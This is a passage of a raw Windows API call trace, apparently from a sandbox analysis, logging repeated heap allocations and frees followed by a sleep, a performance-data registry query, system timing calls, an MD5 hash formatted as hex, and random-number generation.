(HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.755] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.756] GetProcessHeap () returned 0xe30000 [0069.756] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.757] GetProcessHeap () returned 0xe30000 [0069.757] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.757] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0069.758] GetProcessHeap () returned 0xe30000 [0069.758] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.759] GetProcessHeap () returned 0xe30000 [0069.759] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.759] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.760] GetProcessHeap () returned 0xe30000 [0069.760] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.761] GetProcessHeap () returned 0xe30000 [0069.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.762] GetProcessHeap () returned 0xe30000 [0069.762] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xea0cb0 | out: hHeap=0xe30000) returned 1 [0069.762] GetProcessHeap () returned 0xe30000 [0069.762] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0069.763] GetProcessHeap () returned 0xe30000 [0069.763] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d540 | out: hHeap=0xe30000) returned 1 [0069.763] GetProcessHeap () returned 0xe30000 [0069.763] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe505f0 | out: hHeap=0xe30000) returned 1 [0069.763] Sleep (dwMilliseconds=0xea60) [0080.081] GetTickCount () returned 0x116dccb [0080.081] GetProcessHeap () returned 0xe30000 [0080.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xed56d0 [0080.081] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xed56d0, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xed56d0*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0080.086] GetProcessHeap () returned 0xe30000 [0080.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed56d0 | out: hHeap=0xe30000) returned 1 [0080.086] GetTickCount () returned 0x116dccb [0080.086] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0080.087] GetCurrentProcess () returned 0xffffffff [0080.087] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0080.087] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed5218) returned 1 [0080.090] CryptCreateHash (in: hProv=0xed5218, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0080.090] CryptHashData (hHash=0xec2470, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0080.090] CryptGetHashParam (in: hHash=0xec2470, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0080.090] CryptGetHashParam (in: hHash=0xec2470, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0080.090] CryptDestroyHash (hHash=0xec2470) returned 1 [0080.090] CryptReleaseContext (hProv=0xed5218, dwFlags=0x0) returned 1 [0080.090] GetProcessHeap () returned 0xe30000 [0080.090] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xeca148 [0080.090] wnsprintfA (in: pszDest=0xeca148, cchDest=4, pszFmt="%02x" | out: pszDest="09") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca14a, cchDest=4, pszFmt="%02x" | out: pszDest="d8") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca14c, cchDest=4, pszFmt="%02x" | out: pszDest="85") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca14e, cchDest=4, pszFmt="%02x" | out: pszDest="17") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca150, cchDest=4, pszFmt="%02x" | out: pszDest="3d") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca152, cchDest=4, pszFmt="%02x" | out: pszDest="58") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca154, cchDest=4, pszFmt="%02x" | out: pszDest="92") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca156, cchDest=4, pszFmt="%02x" | out: pszDest="fc") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca158, cchDest=4, pszFmt="%02x" | out: pszDest="57") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca15a, cchDest=4, pszFmt="%02x" | out: pszDest="c6") returned 2 [0080.090] wnsprintfA (in: pszDest=0xeca15c, cchDest=4, pszFmt="%02x" | out: pszDest="f4") returned 2 [0080.091] wnsprintfA (in: pszDest=0xeca15e, cchDest=4, pszFmt="%02x" | out: pszDest="6a") returned 2 [0080.091] wnsprintfA (in: pszDest=0xeca160, cchDest=4, pszFmt="%02x" | out: pszDest="d7") returned 2 [0080.091] wnsprintfA (in: pszDest=0xeca162, cchDest=4, pszFmt="%02x" | out: pszDest="c9") returned 2 [0080.091] wnsprintfA (in: pszDest=0xeca164, cchDest=4, pszFmt="%02x" | out: pszDest="d5") returned 2 [0080.091] wnsprintfA (in: pszDest=0xeca166, cchDest=4, pszFmt="%02x" | out: pszDest="6a") returned 2 [0080.091] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed53b0) returned 1 [0080.092] CryptGenRandom (in: hProv=0xed53b0, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0080.092] CryptReleaseContext (hProv=0xed53b0, dwFlags=0x0) returned 1 [0080.092] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xecab68 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9e0f8 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xed0058 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xed02e0 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xed0570 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xed31f0 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9da38 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed3680 [0080.093] GetProcessHeap () returned 0xe30000 [0080.093] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: 